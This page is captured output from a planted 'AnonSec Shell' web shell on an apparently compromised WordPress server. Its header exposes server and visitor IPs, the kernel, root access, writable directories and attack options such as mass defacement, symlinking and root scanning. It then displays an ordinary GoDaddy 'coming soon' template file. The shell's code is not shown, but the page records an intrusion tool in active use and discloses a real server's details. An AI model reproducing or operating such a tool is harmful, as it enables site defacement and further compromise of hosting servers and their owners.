AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.12.154.27   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/vendor/wpex/godaddy-launch/includes/LiveSiteControl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/vendor/wpex/godaddy-launch/includes/LiveSiteControl/template-coming-soon.php
<?php
/**
 * Page template for a restricted site.
 *
 * @package GoDaddy
 */

use GoDaddy\WordPress\Plugins\Launch\Helper;

add_filter( 'gdl_coming_soon_page', '__return_true' );
header( 'X-Robots-Tag: index, nofollow' );

?>
<!doctype html>
<html>

<head <?php get_language_attributes(); ?>>
	<meta charset="<?php bloginfo( 'charset' ); ?>" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
	<meta name="robots" content="index, nofollow" />
	<title><?php echo esc_html( get_bloginfo( 'name' ) ); ?></title>
	<style>
		body {
			display: flex;
			flex-direction: column;
			align-items: center;
			justify-content: center;
			padding: 20px;
			margin: 0;
			height: calc( 100vh - 40px );
			background:
				linear-gradient(
					101.44deg,
					rgba(252, 204, 203, 0.2) 16.81%,
					rgba(239, 230, 212, 0.2) 53.67%,
					rgba(211, 220, 243, 0.2) 67.17%,
					rgba(217, 245, 253, 0.2) 76.66%,
					rgba(255, 255, 255, 0.2) 86.88%
				),
				linear-gradient(0deg, #FFFFFF, #FFFFFF);
		}

		h1, p {
			max-width: 820px;
			margin: 0;
		}

		h1 {
			font-family: Baskerville, Georgia, Cambria, "Times New Roman", Times, serif;
			font-weight: normal;
			font-size: clamp( 36px, 10.5vw, 96px );
			line-height: 1.15em;
			text-align: center;
			color: #000000;
		}

		p {
			font-family: Avenir, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif;
			font-weight: 500;
			font-size: clamp( 16px, 4.4vw, 36px );
			line-height: 1.5em;
			text-align: center;
			color: #2B2B2B;
			margin-top: 2em;
		}

		span {
			display: flex;
			flex-direction: row;
			justify-content: center;
			align-items: center;
			position: absolute;
			bottom: 1rem;
		}

		span > p {
			margin-right: 0.5rem;
			margin-top: 0;
			font-size: 1rem;
			color: #2B2B2B;
		}

		span > a {
			font-size: 1rem;
			text-decoration: none;
			color: #444444;
			font-family: Avenir, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif;
		}
	</style>
</head>

<body>
	<h1><?php esc_html_e( 'Great things are coming soon', 'godaddy-launch' ); ?></h1>
	<p><?php esc_html_e( 'Stay tuned', 'godaddy-launch' ); ?></p>
	<?php if ( defined( 'GD_RESELLER' ) && 1 === GD_RESELLER ) : ?>
		<span>
			<p><?php esc_html_e( 'Powered by', 'godaddy-launch' ); ?></p>
			<a data-eid="wp.fos.coming-soon/template.powered_by.click" href='https://www.godaddy.com/hosting/wordpress-hosting?utm_source=wp_coming_soon_page&utm_medium=link&utm_campaign=wp_coming_soon_page'><?php esc_html_e( 'GoDaddy', 'godaddy-launch' ); ?></a>
		</span>
	<?php endif; ?>

	<script>
		if ( window._expDataLayer ) {
			document.addEventListener('DOMContentLoaded', () => {
				window._expDataLayer.push( {
					data: {
						eid: 'wp.fos.coming-soon.template.impression',
						type: 'impression'
					},
					schema: 'add_event',
					version: 'v1'
				} );
			});
		}
	</script>
	<?php
	// Load the wp_footer action if RUM is enabled.
	$gdl_rum_eid = 'disabled';
	if ( Helper::is_rum_enabled() ) {
		$gdl_rum_eid = 'enabled';
		do_action( 'wp_footer' ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
	}
	?>
	<script>
		if ( window._expDataLayer ) { // Send RUM impression event.
			let eid = 'wp.fos.coming-soon.template.rum-<?php esc_html( $gdl_rum_eid ); ?>';
			document.addEventListener('DOMContentLoaded', () => {
				window._expDataLayer.push( {
					data: {
						eid,
						type: 'impression'
					},
					schema: 'add_event',
					version: 'v1'
				} );
			});
		}
	</script>
</body>

</html>

Anon7 - 2022
AnonSec Team